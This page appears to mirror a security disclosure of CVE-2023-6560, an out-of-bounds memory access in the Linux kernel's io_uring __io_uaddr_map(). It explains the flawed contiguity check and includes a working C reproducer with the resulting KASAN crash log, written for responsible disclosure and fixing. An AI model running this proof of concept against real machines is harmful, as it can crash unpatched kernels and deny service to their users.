Security
Headlines
HeadlinesLatestCVEs

Headline

io_uring __io_uaddr_map() Dangerous Multi-Page Handling

__io_uaddr_map() in io_uring suffers from dangerous handling of the multi-page region.

Packet Storm
#ios#google#linux#debian#perl#bios
io_uring: __io_uaddr_map() handles multi-page region dangerously__io_uaddr_map() wants to import a region from userspace, and then address theimported region through the linear mapping area. This requires that theimported region is physically contiguous.A comment in __io_uaddr_map() explains that the imported region is usuallyjust a single page, in which case that is trivially fine.However, __io_uaddr_map() also has code intended to permit multi-page regions,in which case it tries to enforce that the entire region maps to the samefolio (in other words, the same head page):        /*         * Should be a single page. If the ring is small enough that we can         * use a normal page, that is fine. If we need multiple pages, then         * userspace should use a huge page. That's the only way to guarantee         * that we get contigious memory, outside of just being lucky or         * (currently) having low memory fragmentation.         */        if (page_array[0] != page_array[ret - 1])                goto err;This code is wrong for (more or less) two reasons:1. It only checks the first and last page; it doesn't check any of the pages   in between. Userspace can easily create a set of adjacent VMAs such that   the first and last virtual page map to the same physical page, while pages   in between map to entirely unrelated pages.2. It misunderstands how compound pages are represented in the kernel, and   will always reject the case it is supposed to allow:   `pin_user_pages_fast()` would return a set of adjacent `struct page`   instances that are associated with the same head page / folio; it   wouldn't return the same `struct page *` for every subpage.   Every chunk of memory of size `PAGE_SIZE` maps to its own `struct page`.So if this code is presented with a userspace region of the following shape,containing individual 4K pages:[page A][page B][...][page A]then it will accept the region and assume that `page_to_virt(<page A>)`returns the address of a page as big as the entire region. Accesses to thefirst 4KiB of the region would work as intended; but accesses to later partsof the region will be out-of-bounds accesses to unrelated pages.Here's a reproducer that submits a bunch of NOP ops (zeroed sqes) until itoverruns the end of the first sq page:```#define _GNU_SOURCE#include <unistd.h>#include <err.h>#include <stdio.h>#include <sys/mman.h>#include <sys/syscall.h>#include <linux/io_uring.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})#define NUM_SQ_PAGES 4int main(void) {  int memfd_sq = SYSCHK(memfd_create(\"\", 0));  int memfd_cq = SYSCHK(memfd_create(\"\", 0));  SYSCHK(ftruncate(memfd_sq, NUM_SQ_PAGES * 0x1000));  SYSCHK(ftruncate(memfd_cq, NUM_SQ_PAGES * 0x1000));  // sq  void *sq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_sq, 0));  SYSCHK(mmap(sq_data+(NUM_SQ_PAGES-1)*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_sq, 0));  // cq (rings)  void *cq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_cq, 0));  *(volatile unsigned int *)(cq_data+4) = 64 * NUM_SQ_PAGES;  for (int i=1; i<NUM_SQ_PAGES; i++)    SYSCHK(mmap(cq_data+i*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_cq, 0));  struct io_uring_params params = {    .flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY /*| IORING_SETUP_CQE32*/,    .sq_off = {      .user_addr = (unsigned long)sq_data    },    .cq_off = {      .user_addr = (unsigned long)cq_data    }  };  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/64 * NUM_SQ_PAGES, &params));  printf(\"uring_fd = %d\\", uring_fd);  /* submit nops */  int enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 64 * NUM_SQ_PAGES, 0, 0, NULL));  printf(\"enter returned %d\\", enter_res);}```It gives an ASAN splat like this (but note that the splat diagnostic is wrong because ASAN can't detect page OOB access properly):```[   73.380288] ==================================================================[   73.381745] BUG: KASAN: slab-use-after-free in io_submit_sqes+0x223/0xc00[   73.382822] Read of size 1 at addr ffff88810263a000 by task uring-multipage/708[   73.383967] [   73.384240] CPU: 6 PID: 708 Comm: uring-multipage Not tainted 6.7.0-rc2 #357[   73.385316] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014[   73.386778] Call Trace:[   73.387177]  <TASK>[   73.387520]  dump_stack_lvl+0x4a/0x80[   73.388117]  print_report+0xcf/0x670[...][   73.389595]  kasan_report+0xd8/0x110[...][   73.391954]  io_submit_sqes+0x223/0xc00[   73.392570]  __do_sys_io_uring_enter+0x965/0x1200[...][   73.397438]  do_syscall_64+0x46/0xf0[   73.398004]  entry_SYSCALL_64_after_hwframe+0x6e/0x76[   73.398787] RIP: 0033:0x7ff8ed2e7989[   73.399494] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d d7 64 0c 00 f7 d8 64 89 01 48[   73.402164] RSP: 002b:00007fff76dc3598 EFLAGS: 00000202 ORIG_RAX: 00000000000001aa[   73.403277] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff8ed2e7989[   73.404314] RDX: 0000000000000000 RSI: 0000000000000100 RDI: 0000000000000005[   73.411155] RBP: 00007fff76dc3690 R08: 0000000000000000 R09: 0000020000000100[   73.412496] R10: 0000000000000000 R11: 0000000000000202 R12: 000055967f6680a0[   73.417987] R13: 00007fff76dc3770 R14: 0000000000000000 R15: 0000000000000000[   73.419272]  </TASK>[removed irrelevant alloc/free traces of the accessed memory region][   73.449202] [   73.449471] The buggy address belongs to the object at ffff88810263a000[   73.449471]  which belongs to the cache kmalloc-128 of size 128[   73.451228] The buggy address is located 0 bytes inside of[   73.451228]  freed 128-byte region [ffff88810263a000, ffff88810263a080)[   73.453173] [   73.453429] The buggy address belongs to the physical page:[   73.454232] page:000000002be796b3 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10263a[   73.455535] head:000000002be796b3 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0[   73.456662] flags: 0x200000000000840(slab|head|node=0|zone=2)[   73.457522] page_type: 0xffffffff()[   73.458045] raw: 0200000000000840 ffff8881000428c0 ffffea0004747e80 0000000000000002[   73.459143] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000[   73.460305] page dumped because: kasan: bad access detected[   73.461091] [   73.461353] Memory state around the buggy address:[   73.462038]  ffff888102639f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[   73.463058]  ffff888102639f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[   73.464277] >ffff88810263a000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb[   73.465289]                    ^[   73.465791]  ffff88810263a080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc[   73.466795]  ffff88810263a100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb```I'm not sure about the best way to fix it - since the compound page supportcan't actually have worked, as explained above, maybe it's easiest to justdrop support for compound pages? \u03bfr alternatively we could fix that, but sincenobody seems to have used it, that'd maybe be unnecessary complexity...This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-02-22.Related CVE Numbers: CVE-2023-6560.Found by: [email protected]

Related news

Ubuntu Security Notice USN-6680-2

Ubuntu Security Notice 6680-2 - 黄思聪 discovered that the NFC Controller Interface implementation in the Linux kernel did not properly handle certain memory allocation failure conditions, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service. It was discovered that a race condition existed in the Bluetooth subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

Ubuntu Security Notice USN-6680-1

Ubuntu Security Notice 6680-1 - 黄思聪 discovered that the NFC Controller Interface implementation in the Linux kernel did not properly handle certain memory allocation failure conditions, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service. It was discovered that a race condition existed in the Bluetooth subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

CVE-2023-6560: cve-details

An out-of-bounds memory access flaw was found in the io_uring SQ/CQ rings functionality in the Linux kernel. This issue could allow a local user to crash the system.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution